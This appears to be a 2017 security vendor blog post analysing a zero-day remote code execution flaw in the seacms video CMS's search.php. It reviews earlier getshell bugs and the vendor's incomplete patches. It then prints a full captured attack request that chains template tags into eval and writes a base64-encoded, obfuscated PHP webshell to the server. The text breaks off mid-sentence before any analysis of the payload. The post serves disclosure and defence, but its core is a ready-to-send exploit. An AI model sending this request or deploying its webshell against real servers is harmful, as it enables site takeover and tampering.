Summary
Recently, one of our security hosting customers responded that their server was attacked, and hackers uploaded webshell and tampered with the content of the web page. After we installed the cloud lock protection software for the customer, we intercepted a 0day vulnerability for ocean CMS (seacms). Ocean CMS is a set of video on demand system designed for different demand webmasters. It has a high market share in film and television CMS. Its official address is: http://www.seacms.net/
Several old loopholes in marine CMS (seacms) and their repairing methods
In February 2017, a foreground getshell vulnerability was exposed in CMS 6.45. Please refer to http://blog.csdn.net/qq_/article/details/76595817 for details. The vulnerability is due to the fact that search.php does not filter user input, which causes the order parameter submitted by the attacker to enter the parseif function to execute eval. The official fix in version 6.46 is to filter the parameters entered by users and limit the length to 20 characters. However, this repair method does not completely fix the vulnerability, because several parameters entered by the user can be combined during the replacement operation, so the patch is bypassed. Later, the official released version 6.54 on August 7 to fix the vulnerability again. This fix added a sentence:
$order = ($order == "commend" || $order == "time" || $order == "hit") ? $order : "";
That is to say, the order parameter can only be fixed content, which avoids the attack through the order parameter, but does not solve the problem of other parameters entering the parseif function.
Analysis of 0day vulnerability in marine CMS (seacms)
The attack payload we captured is as follows:
POST /search.php HTTP/1.1
Host: www.xxx.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 1317
Connection: keep-alive
Upgrade-Insecure-Requests: 1
searchword={if{searchpage:year}&searchtype=5&year=:e{searchpage:area}}&area=v{searchpage:letter}&letter=al{searchpage:lang}&yuyan=(join{searchpage:jq}&jq=($_P{searchpage:ver}&&ver=OST[9]))&9[]=file_p&9[]=ut_contents('./data/cache/wee.&9[]=php',base&9[]=64_decode('PD9waHAgCiRsZz0iWlRack5HdGZhMlJyaXJaV3RpcmphMjlyWkdpcnRsaXJJaWs3Q2lSelluQWdQaXJTQWtkaXJtSnNLQ2lySmpkSGNpTENJaUxDSmpkSGlyZGppclkzUjNjaXJtVmpkSGRoZEdOMGQyVmpkSGRmWm1OMGQzVnVpclkyTiI7CiR2cT0iSUFva2RXWTlpckluTnVZek1pT3dva2EyRTlpcklrbEZRbXhraXJiVVppYzBzaU93aXJva2NHcDBpclBTSkRVbVpWUlRsVVZraXJZaU93b2tkbUpzSUQwZ2MzUnlYM0psY0d4aFkyVW9pckluaXJScElpd2lJaXdpZEciOwokamogPSBzdHJfcmVwbGFjZSgicGMiLCIiLCJwY3NwY3RycGNfcGNycGNlcGNwbHBjYWNwY2UiKTsKJHJrZj0ibHpkR2xpcjBkR2x5ZEdsZmNpcm5ScFpYUnBjR3gwaXJhV0YwaXJhV05sSWlrN0NpUnBjWGM5SWtZMlkybGtaRWlydFVjejBpT3dva1ltaXJ0bUlpckRpcjBnSkhaaWJDZ2lheUlzSUNJaUxDaXJBaWEySmhhM05yIjsKJHFpPSIwZDNSamRIZHBiMk4wZDJpcjRpS1RzS2lySkcxd2VTQTlJQ1J6WW5Bb0p5Y3NJQ1JpYTJZb0pIWmliQ2dpWWlJc0lDSWlMaXJDQWthMkV1SkhpckJpcnFkQzRrZFdZdUpHbHhkeWtpcnBLVHNnSkcxd2VTZ3BPd289IjsKJG5zeCA9ICRqaigiZGQiLCAiIiwgImJkZGFzZGRlZGQ2ZGQ0ZGRfZGRkZGRlZGRjZGRvZGRkZGRlIik7CiRpZmwgPSAkamooImVmIiwiIiwiZWZjcmVhdGVmZV9lZmZlZnVlZm5lZmNlZnRpZWZvZWZuIik7CiRqZXogPSAkaWZsKCcnLCAkbnN4KCRqaigiaXIiLCAiIiwgJHZxLiRya2YuJGxnLiRxaSkpKTsgJGpleigpOwo/Pg=='));ec&9[]=ho(md5(123));exit;
As you can see, attack
Posted on October 17, 2017 at 4:29 PM by admin · permalinkin: Web Security